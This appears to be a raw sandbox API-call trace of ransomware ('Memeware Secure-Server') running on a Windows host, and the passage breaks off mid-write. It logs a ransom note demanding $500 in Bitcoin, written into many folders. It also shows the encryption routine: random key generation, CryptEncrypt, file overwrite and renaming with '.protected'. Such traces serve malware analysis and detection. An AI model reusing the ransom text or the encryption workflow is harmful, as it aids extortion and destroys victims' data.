hTemplateFile=0x0) returned 0x150 [0089.903] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.904] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.905] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.905] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.905] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.905] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.905] CloseHandle (hObject=0x150) returned 1 [0089.905] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.905] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.905] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 88 [0089.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.906] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.906] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.906] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.906] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.906] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.906] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.907] CloseHandle (hObject=0x14c) returned 1 [0089.908] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.908] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.908] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 84 [0089.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.908] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.908] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.910] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.910] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.910] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.910] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.910] CloseHandle (hObject=0xd8) returned 1 [0089.911] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Windows") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Program Files") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="Program Files (x86)") returned -1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="$Recycle.bin") returned 1 [0089.911] lstrcmpiW (lpString1="Document Building Blocks", lpString2="System Volume Information") returned -1 [0089.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 84 [0089.911] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0089.911] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0089.911] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned 86 [0089.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.911] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.911] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.911] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.911] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.") returned 86 [0089.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.912] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.912] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\..") returned 87 [0089.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.912] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0089.912] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 89 [0089.912] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0089.912] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0089.912] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned 91 [0089.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\.") returned 91 [0089.913] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.913] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.913] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.913] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.913] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\..") returned 92 [0089.913] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.913] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Program Files") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="Program Files (x86)") returned -1 [0089.913] lstrcmpiW (lpString1="14", lpString2="$Recycle.bin") returned 1 [0089.913] lstrcmpiW (lpString1="14", lpString2="System Volume Information") returned -1 [0089.913] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14") returned 92 [0089.913] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0089.913] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*") returned 94 [0089.914] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.914] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.914] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\.") returned 94 [0089.914] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.914] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\..") returned 95 [0089.914] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.914] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Windows") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Program Files") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Program Files (x86)") returned -1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="$Recycle.bin") returned 1 [0089.914] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="System Volume Information") returned -1 [0089.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrIW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".protected") returned 0x0 [0089.915] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="RESTORE_FILES.txt") returned -1 [0089.915] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.915] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".txt") returned 0x0 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".rar") returned 0x0 [0089.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned 122 [0089.915] StrStrW (lpFirst="Built-In Building Blocks.dotx", lpSrch=".zip") returned 0x0 [0089.916] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0089.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.917] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0089.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.917] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.930] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.930] CloseHandle (hObject=0x154) returned 1 [0089.930] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.protected") returned 132 [0089.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.protected")) returned 1 [0089.931] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.931] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.931] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\RESTORE_FILES.txt") returned 110 [0089.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment 